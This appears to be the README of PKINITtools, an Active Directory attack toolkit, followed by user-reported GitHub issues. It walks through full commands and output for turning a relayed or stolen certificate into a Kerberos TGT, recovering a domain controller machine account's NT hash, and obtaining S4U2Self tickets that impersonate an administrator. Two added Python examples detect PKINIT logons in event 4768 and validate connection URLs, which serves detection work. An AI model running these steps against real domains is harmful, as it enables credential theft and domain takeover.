PKINIT tools

This repository contains some utilities for playing with PKINIT and certificates.
The tools are built on minikerberos and impacket. Accompanying blogpost with more context: https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/

Installation

These tools are only compatible with Python 3.5+. Clone the repository from GitHub, install the dependencies and you should be good to go:

git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos

Using a virtualenv for this is recommended.

Tools

gettgtpkinit.py

Request a TGT using a PFX file, either as file or as base64 encoded blob, or PEM files for cert+key. This uses Kerberos PKINIT and will output a TGT into the specified ccache. It will also print the AS-REP encryption key which you may need for the getnthash.py tool. Usage example:

(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py -h
usage: gettgtpkinit.py [-h] [-cert-pfx file] [-pfx-pass password] [-pfx-base64 BASE64] [-cert-pem file] [-key-pem file] [-dc-ip DC_IP] [-v]
                       domain/username ccache

Requests a TGT using Kerberos PKINIT and either a PEM or PFX based certificate+key

positional arguments:
  domain/username     Domain and username in the cert
  ccache              ccache file to store the TGT in

optional arguments:
  -h, --help          show this help message and exit
  -cert-pfx file      PFX file
  -pfx-pass password  PFX file password
  -pfx-base64 BASE64  PFX file as base64 string
  -cert-pem file      Certificate in PEM format
  -key-pem file       Private key file in PEM format
  -dc-ip DC_IP        DC IP or hostname to use as KDC
  -v, --verbose

(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py testsegment.local/s2019dc\$ -cert-pfx ~/impacket-py3/cert.pfx -pfx-pass hoi s2019dc.ccache
2021-07-27 21:25:24,299 minikerberos INFO     Loading certificate and key from file
2021-07-27 21:25:24,316 minikerberos INFO     Requesting TGT
2021-07-27 21:25:24,333 minikerberos INFO     AS-REP encryption key (you might need this later):
2021-07-27 21:25:24,333 minikerberos INFO     5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
2021-07-27 21:25:24,336 minikerberos INFO     Saved TGT to file
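From the defender's side, a TGT obtained the way gettgtpkinit.py does it shows up on the domain controller as a Kerberos authentication ticket event (Security event 4768) whose PreAuthType is 16 (PA-PK-AS-REQ, the PKINIT pre-authentication type from RFC 4556) and whose certificate fields are populated. The following added example, which is not part of PKINITtools, scans 4768 records for exactly that combination. The event XML records are constructed samples that only carry the fields the check needs; the field names (PreAuthType, CertIssuerName, CertSerialNumber, CertThumbprint) are the ones Windows writes into 4768, but the values are made up.

```python
"""Flag PKINIT-based TGT requests in Windows Security event 4768 records.

Added example for the gettgtpkinit.py section; not part of PKINITtools.
The events below are constructed samples, not real logs.
"""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
PA_PK_AS_REQ = "16"      # pre-authentication type 16: PKINIT (RFC 4556)
PA_ENC_TIMESTAMP = "2"   # pre-authentication type 2: password-based


def _event(event_id, **data):
    """Build a constructed, minimal Windows event XML record."""
    rows = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in data.items())
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        f"<System><EventID>{event_id}</EventID></System>"
        f"<EventData>{rows}</EventData></Event>"
    )


# Constructed sample events: one PKINIT TGT request for a machine account,
# one password-based TGT request, and one unrelated service-ticket event.
SAMPLE_EVENTS = [
    _event(4768, TargetUserName="s2019dc$", TargetDomainName="TESTSEGMENT.LOCAL",
           IpAddress="::ffff:10.0.0.50", PreAuthType=PA_PK_AS_REQ,
           CertIssuerName="testsegment-CA", CertSerialNumber="01",
           CertThumbprint="AA" * 20),
    _event(4768, TargetUserName="alice", TargetDomainName="TESTSEGMENT.LOCAL",
           IpAddress="::ffff:10.0.0.51", PreAuthType=PA_ENC_TIMESTAMP,
           CertIssuerName="", CertSerialNumber="", CertThumbprint=""),
    _event(4769, TargetUserName="alice", ServiceName="cifs/fileserver",
           IpAddress="::ffff:10.0.0.51"),
]


def parse_event(xml_text):
    """Return (event id, {field name: value}) for one event XML record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", EVENT_NS).text)
    fields = {d.get("Name"): (d.text or "")
              for d in root.iterfind("e:EventData/e:Data", EVENT_NS)}
    return event_id, fields


def is_pkinit_tgt_request(event_id, fields):
    """True for a 4768 whose pre-auth was PKINIT and that carries a certificate."""
    return (event_id == 4768
            and fields.get("PreAuthType") == PA_PK_AS_REQ
            and fields.get("CertThumbprint", "") != "")


def find_pkinit_tgt_requests(events):
    """Scan raw event XML strings and summarise every PKINIT TGT request."""
    hits = []
    for xml_text in events:
        event_id, f = parse_event(xml_text)
        if not is_pkinit_tgt_request(event_id, f):
            continue
        hits.append({
            "principal": f"{f.get('TargetUserName', '')}@{f.get('TargetDomainName', '')}",
            "source_ip": f.get("IpAddress", ""),
            "cert_issuer": f.get("CertIssuerName", ""),
            "cert_thumbprint": f.get("CertThumbprint", ""),
            # machine accounts end in '$'; certificate logons for them from a
            # non-domain-member address are the case this README is about
            "machine_account": f.get("TargetUserName", "").endswith("$"),
        })
    return hits


if __name__ == "__main__":
    for hit in find_pkinit_tgt_requests(SAMPLE_EVENTS):
        print(hit)
```

The thumbprint and issuer in a hit can be compared against the certificates the CA actually issued for that principal; a PKINIT TGT for a machine account coming from an address that is not the machine itself is the pattern worth alerting on.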

getnthash.py

Uses Kerberos U2U (user-to-user) to submit a TGS request for a ticket to yourself. The resulting ticket includes the PAC, which in turn contains the NT hash; that hash can be decrypted with the AS-REP key that was used for your specific TGT. It's magic really. This tool requires the TGT obtained through PKINIT to be in the ccache referenced by your KRB5CCNAME environment variable. Usage:

(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py -h
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: getnthash.py [-h] -key KEY [-dc-ip ip address] [-debug] identity

positional arguments:
  identity           domain/username

optional arguments:
  -h, --help         show this help message and exit
  -key KEY           AS REP key from gettgtpkinit.py
  -dc-ip ip address  IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -debug             Turn DEBUG output ON

(PKINITtools) user@localhost:~/PKINITtools$ export KRB5CCNAME=s2019dc.ccache
(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py testsegment.local/s2019dc\$ -key 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
fa6b130d73311d1be5495f589f9f4571

gets4uticket.py

Uses Kerberos S4U2Self to request a service ticket that is valid on the host for which you've obtained a certificate. This ticket can then be used to interact with that host. It only requires a TGT for the machine account of this host; that TGT must be in a ccache file, which you specify in the kerberos_connection_url. The only kerberos_connection_url accepted by this tool is one that references a ccache file, for example kerberos+ccache://domain.local\\victimhostname\$:[email protected]. The SPN should be a service name on the host you are impersonating. You can't use this for delegation attacks, since it does not implement S4U2Proxy (there are plenty of tools for that already). Usage:

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py -h
usage: gets4uticket.py [-h] [-v] kerberos_connection_url spn targetuser ccache

Gets an S4U2self ticket impersonating given user

positional arguments:
  kerberos_connection_url
                        the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@<domaincontroller-ip>
  spn                   the service principal in format <service>/<server-hostname>@<domain> Example: cifs/[email protected] for a
                        TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
  targetuser
  ccache                ccache file to store the TGT ticket in

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO     Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO     Success!
2021-07-28 10:09:13,696 minikerberos INFO     Done!
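The kerberos_connection_url argument follows the minikerberos connection-string shape shown in the help text above, kerberos+ccache://domain\user:file.ccache@<domaincontroller-ip>, and gets4uticket.py accepts only the ccache variant. The following added example, which is not part of PKINITtools or minikerberos, parses that one shape and rejects any other secret type in the scheme. It assumes that the part after "kerberos+" names the secret type (as it does for ccache) and uses a constructed DC hostname; note that the backslash and the trailing "$" of a machine account only need escaping in the shell, as in the README's `domain.local\\s2019dc\$`, not inside a Python string.

```python
"""Parse and validate the kerberos_connection_url that gets4uticket.py expects.

Added example; not part of PKINITtools or minikerberos. Only the URL shape
documented in the README is implemented:
    kerberos+ccache://domain\\user:file.ccache@<domaincontroller-ip>[:port]
"""
import re
from dataclasses import dataclass

KERBEROS_DEFAULT_PORT = 88

# scheme is kerberos+<secret type>; only "ccache" is valid for gets4uticket.py
_URL_RE = re.compile(
    r"^kerberos\+(?P<secret_type>[a-z0-9]+)://"
    r"(?P<domain>[^\\/:@]+)\\"        # domain, then a literal backslash
    r"(?P<user>[^\\:@]+):"            # user (machine accounts end in '$')
    r"(?P<secret>[^@]+)@"             # ccache file path
    r"(?P<dc>[^:/]+)"                 # domain controller host or IP
    r"(?::(?P<port>\d{1,5}))?/?$",    # optional port, optional trailing slash
    re.IGNORECASE,
)


@dataclass(frozen=True)
class KerberosCcacheURL:
    domain: str
    user: str
    ccache_path: str
    dc: str
    port: int = KERBEROS_DEFAULT_PORT

    @property
    def principal(self) -> str:
        """Kerberos principal name in user@REALM form."""
        return f"{self.user}@{self.domain.upper()}"


def parse_kerberos_ccache_url(url: str) -> KerberosCcacheURL:
    """Parse a kerberos+ccache:// URL; raise ValueError for anything else."""
    m = _URL_RE.match(url)
    if not m:
        raise ValueError(
            f"not a kerberos+<type>://domain\\user:secret@dc URL: {url!r}")
    if m["secret_type"].lower() != "ccache":
        # gets4uticket.py only reads a TGT from a ccache file; any other secret
        # type (assumed to exist for other minikerberos tools) is refused here
        raise ValueError(
            f"only ccache secrets are accepted, got {m['secret_type']!r}")
    port = int(m["port"]) if m["port"] else KERBEROS_DEFAULT_PORT
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return KerberosCcacheURL(domain=m["domain"], user=m["user"],
                             ccache_path=m["secret"], dc=m["dc"], port=port)


if __name__ == "__main__":
    # constructed example: DC hostname is made up for illustration
    url = "kerberos+ccache://testsegment.local\\s2019dc$:s2019dc.ccache@dc01.testsegment.local"
    parsed = parse_kerberos_ccache_url(url)
    print(parsed.principal, "->", parsed.ccache_path, "via", parsed.dc, parsed.port)
```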

License

MIT

Credits

pkinittools's Issues

AttributeError: 'str' object has no attribute 'value'

Hi,

Thank you for your effort developing this tool. I am trying to use the tool to request a TGT but it currently fails. See below for the command I used and the related error.

──(shadow)─(root💀kali)-[/home/kali/pentest/PKINITtools-master]
└─# python3 gettgtpkinit.py adlab.local/user_t_1_admins user_t_1_admins.ccache -cert-pfx /home/kali/pentest/pywhisker-main/hHKEiIIf.pfx -pfx-pass OhEKkA1wkW7FC1xUX337
2021-09-13 19:40:13,894 minikerberos INFO Loading certificate and key from file
2021-09-13 19:40:13,919 minikerberos INFO Requesting TGT
Traceback (most recent call last):
  File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv
    raise KerberosError(krb_message)
  File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/protocol/errors.py", line 20, in __init__
    super(Exception, self).__init__('%s Error Code: %d Reason: %s ' % (extra_msg, self.errorcode.value, self.errormsg.value))
AttributeError: 'str' object has no attribute 'value'

Missing minikerberos.pkinit

Python version: Python 3.9
OS: Kali Linux 2021.XX
PKINIT Status: Worked with Rubeus

I encountered the error from minikerberos.pkinit import PKINIT missing. I had installed oscrypto and minikerberos and also did python -m pip install -r requirements.txt to no avail. I tried sudo and no sudo adaptions also to no avail. In the end, I found that uninstalling minikerberos and installing from their GitHub repository succeeded.

Adding this issue to note the workaround for future reference and closing due to likely pip being out-of-date.

"Error detecting the version of libcrypto"

Hi,

Thank you for this tool.

Upon testing this today on the latest version of Kali I get the below error. I have installed PKINITools as per your instructions here. I believe that wbond/oscrypto#78 is the issue. I also reported the same issue for LdapRelayScan but the fix I found there does not work here. Perhaps because oscrypto is installed during installation of minikerberos and therefore cannot be commented out and replaced.

This is becoming an epidemic. Vital tools are no longer working.

Update 1: Found a temporary fix for this issue. After installing as per the official instructions, execute pip3 install -I git+https://github.com/wbond/oscrypto.git which will install the current master of oscrypto in which this issue is fixed.

KDC has no support for PADATA type (pre-authentication data)

When I get a TGT from a certificate, I get the error shown below:
python3 gettgtpkinit.py -cert-pfx ../temp/PetitPotam/host1.pfx -dc-ip 10.0.0.0.1 domain/test$ test.ccache -v 1 ⨯
2021-07-30 04:59:22,388 minikerberos INFO Loading certificate and key from file
2021-07-30 04:59:22,507 minikerberos INFO Requesting TGT
Traceback (most recent call last):
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.14-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError: Error Code: 16 Reason: KDC has no support for PADATA type (pre-authentication data)

Error message not found! Err code: 75

I need help.

proxychains4 python3 gettgtpkinit.py test.com/'DC1$' -pfx-base64 `cat DC01.pfx.b64` -pfx-pass "admin"  -dc-ip 172.16.12.8 DC01.ccache
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
2024-01-04 11:23:56,834 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-01-04 11:23:56,853 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/home/kali/PKINITtools-master/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/kali/PKINITtools-master/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/kali/PKINITtools-master/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
          ^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv
    raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError:  Error Name: KDC_ERR_CLIENT_NAME_MISMATCH Detail: "Error message not found! Err code: 75" 

Short octet stream on tag decoding

The pfx I obtained using adcs esc8

proxychains4 python3 getnthash.py -key 2797e04fc0a00ce9277ff8ebcf276fe0f660158bc970d560c988a2007180a216 redteam/DC$ -dc-ip 192.168.1.1 -debug
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20240130.154745.97007e84-py3.11.egg/impacket
[+] Using Kerberos Cache: dc.ccache
[+] SPN KRBTGT/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache. 
Traceback (most recent call last):
  File "/home/kali/Desktop/PKINITtools/getnthash.py", line 273, in <module>
    dumper.dump()
  File "/home/kali/Desktop/PKINITtools/getnthash.py", line 121, in dump
    decodedTGT = decoder.decode(tgt, asn1Spec = AS_REP())[0]
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/pyasn1/codec/ber/decoder.py", line 1337, in __call__
    raise error.SubstrateUnderrunError(
pyasn1.error.SubstrateUnderrunError: Short octet stream on tag decoding
[-] Short octet stream on tag decoding

ModuleNotFoundError: No module named 'minikerberos.common.url'

I'm getting an error similar to #6

/PKINITtools/gets4uticket.py", line 17, in <module>
    from minikerberos.common.url import KerberosClientURL, kerberos_url_help_epilog
ModuleNotFoundError: No module named 'minikerberos.common.url'

I've run pip3 install impacket minikerberos per the docs and pip3 list shows

minikerberos                   0.4.0

The command I'm attempting to execute is

┌──(venv)─(user@tehbox)-[~/PKINITtools]
└─$ KRB5CCNAME=out.ccache python3 gets4uticket.py kerberos+ccache://tehdomain.com\\tehdc\$:[email protected] cifs/[email protected] [email protected] targetuser.ccache -v

any ideas on solving this one?

I've tried uninstalling a few times, making sure it's not using the pip3 cache, and I've also tried installing minikerberos from the repo.

Error Code: 62 Reason: The client trust failed or is not implemented

Hello, get this error when trying to get tgt with gettgtpkinit.py (it's ok with rubeus):

python3 gettgtpkinit.py EVIL/DC1-WS2019$ -pfx-base64 @base64Value -dc-ip 192.168.114.2 DC-WS2019.ccache

2021-11-28 04:54:42,236 minikerberos INFO Loading certificate and key from file
2021-11-28 04:54:42,314 minikerberos INFO Requesting TGT
Traceback (most recent call last):
  File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/home/kali/Take and learn/MSEFSR ADCS/impacket/impacket/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv
    raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError: Error Code: 62 Reason: The client trust failed or is not implemented
